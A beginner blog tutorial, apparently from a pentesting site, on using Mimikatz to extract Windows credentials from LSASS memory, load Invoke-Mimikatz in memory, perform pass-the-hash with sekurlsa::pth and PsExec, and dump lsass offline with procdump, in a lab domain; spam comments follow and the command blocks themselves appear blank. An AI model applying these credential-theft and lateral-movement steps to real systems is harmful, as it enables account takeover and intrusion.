Mimikatz – Windows Tutorial for Beginner (Part-1)

Sharing is caring!

mimikatz windows 10 password stealing

Mimikatz is a tool written in C by Benjamin Delpy for Windows Security. Mimikatz is one awesome tool to gather credentials using various methods. Other than Gathering Credentials, Mimikatz can perform various Windows Security Operation such as:

  • Pass-the-Hash and Over-Pass-the-Hash
  • Pass-the-Tickets
  • Building Golden Tickets
  • And much more

In order to gather credentials and hash, administrator privilege will be needed and how to escalate privileges in windows environment can be found on this awesome blog.

To Dump Credentials, we will be starting with Most Popular Option – SEKURLSA

Sekurlsa

This module provides with the functionality of extracting passwords, hashes and tickets by abusing the memory of LSASS.exe (Local Security Authority Subsystem Service).

Overview about LSASS

LSASS (Local Security Authority Subsystem Service) is a Windows Based Service which provides the user with the functionality of SSO (Single Sign-On). Single sign-on (SSO) is a session and user authentication service that permits a user to use one set of login credentials (e.g., name and password) to access multiple applications. The service authenticates the end user for all the applications the user has been given rights to and eliminates further prompts when the user switches applications during the same session. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens. Mimikatz abuses the cache of credentials and provides the attacker with information regarding the credentials of the users.

Note: To Perform the operations with Mimikatz, Administrator Privilege is required.

Running Mimikatz using various methods

Firstly, we need to check whether we have the privileges of administrator on the system.

 

Now that we have checked our privileges on the Windows Box, let’s get our hand dirty.

Firstly we need to download mimikatz and run it. There are multiple ways to run mimikatz and get credentials.

1. We can download the executable from this GitHub link and run it from the command prompt.

 

mimikarts-windows-password

2. We can use PowerShell Mimikatz script (Invoke-Mimikatz.ps1) to run specified functions of Mimikatz. But first, we need to download this script and load it. This can also be done in two ways.

a. Loading the Script in Disk (Really Downloading).

 

 

b. Loading the Script in Memory (Just Loading the Script in Memory).

 

 

mimikatz-windows-password-hack

After Downloading the Invoke-Mimikatz.ps1 script we now need to load the Invoke-Mimikatz script in the powershell session.

And now that we have loaded our script in the session we can easily see what functionality do the script offer us by the following command.

 

 

Now to get the Logon Credentials we just need to fire up the prompt of Mimikatz with the following commands.

Firstly, we need to debug privilege.

The debug privilege allows someone to debug a process that they wouldn’t otherwise have access to. For example, a process running as a user with the debug privilege enabled on its token can debug a service running as local system.

 

 

privilege-debug-windows-mimikatz

We are all set to see the magic….

Getting LogonPasswords

 

 

 

mimikatz-sekurlsa-logonPasswords

We can see the command provides us with a very verbose detailing about the credentials of the user session. LogonPasswords provide every information related to the user credential and module provide with an integrated output of various commands like msv, tspkg, wdigest, and other commands as well.

This Result can also be obtained by Running the Invoke-Mimikatz PowerShell script.

 

This Juicy Information from the above command can be used to perform various techniques and one such technique is Pass-the-Hash.

Pass-the-Hash

Pass-the-Hash is a technique used by the attacker to get access to system present in the network using Hash of the particular user in that System. Basically used for Lateral or Horizontal Movement in Pentesting methodology.

The Table below shows the lab environment setup

IP AddressComputer NameDescriptionWindows Version 
192.168.52.100DC-HACKNPENTESTThis is Domain ControllerWindows Server 2016
192.168.52.200DC1This is Domain ClientWindows Server 2008

Firstly we need to find the hash of the User on which we are aiming to perform Pass the Hash Technique which is Administrator of hacknpentest.local (192.168.52.100 forest root).

As we can see in the below image the administrator’s hash is extracted using the logonPassword functionality.

Now that we have a hash of Administrator we only need to call the pth(pass-the-hash) functionality of the sekurlsa module.

We need to pass following arguments with sekurlsa::pth command.

/user : Define user of domain on which pass-the-hash.

/domain : Define the domain.

/ntlm : Define the ntlm hash of the user. (RC4 can also be used)

After the execution of the command we get a command prompt but wait what does it says!!

The System Still assumes that we are the administrator of the DC1 system(192.168.52.200). We will use PsExec.exe to get command prompt of Administrator on hacknpentest.local.

 

 

And here we are with the Administrator Command Prompt of hacknpentest system(192.168.52.200).

Now that we have seen Pass-the-Hash Technique we will see how to dump credentials from the offline memory dump.

Dumping Credentials from Offline Memory Dump

In this Section we will dump the lsass.exe memory with the help of a sysinternal tool procdump and using that dump file (dmp) we will dump the credentials.

Now we will load this lsass.dmp in mimikatz to extract credentials using minidump functionality of SEKURLSA module.

This Method can also be used to dump credentials when we are not allowed to run mimikatz on the victim’s machine. In this case, we can use this dump file to extract credentials by downloading the dump file on our machine and loading the file in mimikatz using minidump.

But wait! Can we run mimikatz tool remotely?

 

Running Mimikatz Remotely

Invoke-Mimikatz script offers the user with the functionality of running the script remotely and present the user with the same output.

Well, this awesome tool has much more functionality to offer like pass-the-ticket, extracting ekeys, building golden and silver ticket, playing with dpapi master keys and much more.

To know how it can be done, stay tuned to Hacknpentest.com

Till then HacknPentest !!!

 

Share

You may also like...

13 Responses

  1. Avatar Chrinstine says:

    I’ve been browsing online more than 3 hours nowadays, but I by no means found
    any attention-grabbing article like yours. It’s
    pretty worth sufficient for me. In my opinion, if all web owners and bloggers made
    excellent content material as you probably did,
    the net shall be much more useful than ever before.
    Wow, this paragraph is good, my sister is analyzing these kinds of things, so I
    am going to inform her. I will right away grab your rss feed
    as I can’t find your email subscription link or newsletter service.
    Do you have any? Kindly allow me recognise so that I may subscribe.
    Thanks.

    • Satyam Dubey Satyam Dubey says:

      Thanks for showing love to our blog by giving this wonderful feedback. We are soon planning to launch the email subscription feature for our users. Till that Stay tuned to hacknpentest.

  2. Avatar Louise says:

    Hello to every one, for the reason that I am
    actually keen of reading this blog’s post to be updated regularly.

    It carries fastidious material.

  3. I’m not sure exactly why but this website is loading incredibly slow for me.
    Is anyone else having this problem or is it a problem on my end?
    I’ll check back later and see if the problem still exists.

  4. Avatar Cclibbs says:

    I’ve been exploring for a bit for any high-quality articles or weblog posts on this
    kind of space . Exploring in Yahoo I eventually stumbled upon this site.
    Reading this information So I’m happy to exhibit that I have an incredibly just right
    uncanny feeling I discovered just what I needed. I so much undoubtedly will make certain to don?t forget
    this website and give it a look on a constant basis.

  5. Avatar Anonymous says:

    These are trᥙly enormous ideas in regarding blogging. You have touched some fastidious things hеre.
    Any way keep up writing.

  6. Avatar oprol evorter says:

    This design is wicked! You certainly know how to keep a reader entertained. Between your wit and your videos, I was almost moved to start my own blog (well, almost…HaHa!) Fantastic job. I really enjoyed what you had to say, and more than that, how you presented it. Too cool!

  7. Avatar Lionel says:

    You’ve made some decent points there. I checked on the net for more
    info about the issue and found most people will go along with your views on this web site.

  8. Avatar cresent moon cafe says:

    Thanks for ones marvelous posting! I truly enjoyed reading it,
    you will be a great author. I will ensure that I bookmark
    your blog and will often come back sometime soon. I want
    to encourage continue your great work, have a
    nice weekend!

Leave a Reply

Your email address will not be published. Required fields are marked *